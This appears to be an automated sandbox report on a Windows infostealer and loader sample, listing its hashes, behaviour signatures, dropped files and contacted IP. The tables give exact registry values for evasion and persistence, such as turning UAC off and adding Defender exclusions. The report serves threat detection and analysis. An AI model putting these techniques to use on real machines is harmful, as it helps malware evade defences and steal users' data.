Malware Analysis Report

2024-07-11 11:00

Sample ID 240530-dezyaabh91
Target cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc
SHA256 cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc
Tags
amadey lumma redline stealc 1 49e482 @logscloudyt_bot zzvv bootkit discovery evasion execution infostealer persistence ransomware spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc

Threat Level: Known bad

The file cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc was found to be: Known bad.

Malicious Activity Summary

amadey lumma redline stealc 1 49e482 @logscloudyt_bot zzvv bootkit discovery evasion execution infostealer persistence ransomware spyware stealer themida trojan

RedLine

Lumma Stealer

RedLine payload

Amadey

UAC bypass

Stealc

Windows security bypass

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies boot configuration data using bcdedit

Sets service image path in registry

Modifies Installed Components in the registry

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Themida packer

Windows security modification

Drops startup file

Registers COM server for autorun

Checks BIOS information in registry

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Reads data files stored by FTP clients

Unexpected DNS network traffic destination

Identifies Wine through registry keys

Executes dropped EXE

Modifies system executable filetype association

Adds Run key to start application

Checks installed software on the system

Enumerates connected drives

Checks whether UAC is enabled

Accesses cryptocurrency files/wallets, possible credential harvesting

Writes to the Master Boot Record (MBR)

Drops Chrome extension

Drops desktop.ini file(s)

Checks for any installed AV software in registry

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SendNotifyMessage

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

System policy modification

Modifies data under HKEY_USERS

Delays execution with timeout.exe

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious behavior: LoadsDriver

Modifies registry class

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-30 02:56

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-30 02:56

Reported

2024-05-30 02:58

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

146s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Lumma Stealer

stealer lumma

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\360elam64.sys C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A
File opened for modification C:\Windows\system32\drivers\360FsFlt.sys C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Windows\system32\drivers\360FsFlt.sys C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Windows\SysWOW64\drivers\360AvFlt.sys C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\360AvFlt.sys C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Windows\system32\drivers\360elam64.sys C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\IsInstalled = "1" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\Version = "41,0,2195,0" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\Locale = "*" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\ComponentID = "Windows Roots Update" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A} C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\ = "RootsUpdate" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHProtected\ImagePath = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\WscReg.exe\"" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ImagePath = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe\"" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360Camera\ImagePath = "System32\\Drivers\\360Camera64.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360AntiHacker\ImagePath = "System32\\Drivers\\360AntiHacker64.sys" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BAPIDRV\ImagePath = "system32\\DRIVERS\\BAPIDRV64.sys" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360Box64\ImagePath = "system32\\DRIVERS\\360Box64.sys" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360elam64\ImagePath = "system32\\DRIVERS\\360elam64.sys" C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360FsFlt\ImagePath = "system32\\DRIVERS\\360FsFlt.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360AvFlt\ImagePath = "system32\\DRIVERS\\360AvFlt.sys" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360netmon\ImagePath = "system32\\DRIVERS\\360netmon.sys" C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360AvFlt\ImagePath = "system32\\DRIVERS\\360AvFlt.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360AvFlt\ImagePath = "system32\\drivers\\360AvFlt.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360FsFlt\ImagePath = "system32\\DRIVERS\\360FsFlt.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\360elam64\ImagePath = "system32\\DRIVERS\\360elam64.sys" C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SJl7XFiiozcizRe9rOsbUIlM.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Task Manager.lnk C:\Users\Admin\Pictures\H0UVbMblodCc40gmvFoORgyt.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\W3RHf5IDlauw2xLLEFu6nXpk.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\90k57km6dgCoPYO3YD7Tth99.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CUPKdmqFz1ooxBrPhSDvJjzn.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uz12620uwxZn724uCMM9FgMO.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pjO9176lBkxDLSxA7OzRGbEQ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
N/A N/A C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\Pictures\H0UVbMblodCc40gmvFoORgyt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\Pictures\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
N/A N/A C:\Users\Admin\Pictures\wD2dhV3FhycNZg6ppID8rOZD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSB35D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ = "C:\\Program Files (x86)\\360\\Total Security\\MenuEx64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A
Destination IP 54.76.137.217 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QHSafeTray = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\360Tray.exe\" /start" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QHSafeTray = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\360Tray.exe\" /start" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\DisplayName C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ImagePath C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Doctor Web\InstalledComponents C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\DisplayName = "360 Total Security" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Start = "2" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Eset\NOD\CurrentVersion\Info C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Eset\NOD\CurrentVersion\Info C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ObjectName = "LocalSystem" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Start C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Avira C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ErrorControl C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Group C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Alias C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Avira C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ErrorControl = "1" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Group = "TDI" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Type = "16" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Doctor Web\InstalledComponents C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Eset\NOD\CurrentVersion\Info C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ObjectName C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\Type C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense\ImagePath = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe\"" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Eset\NOD\CurrentVersion\Info C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\s: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\w: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\z: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
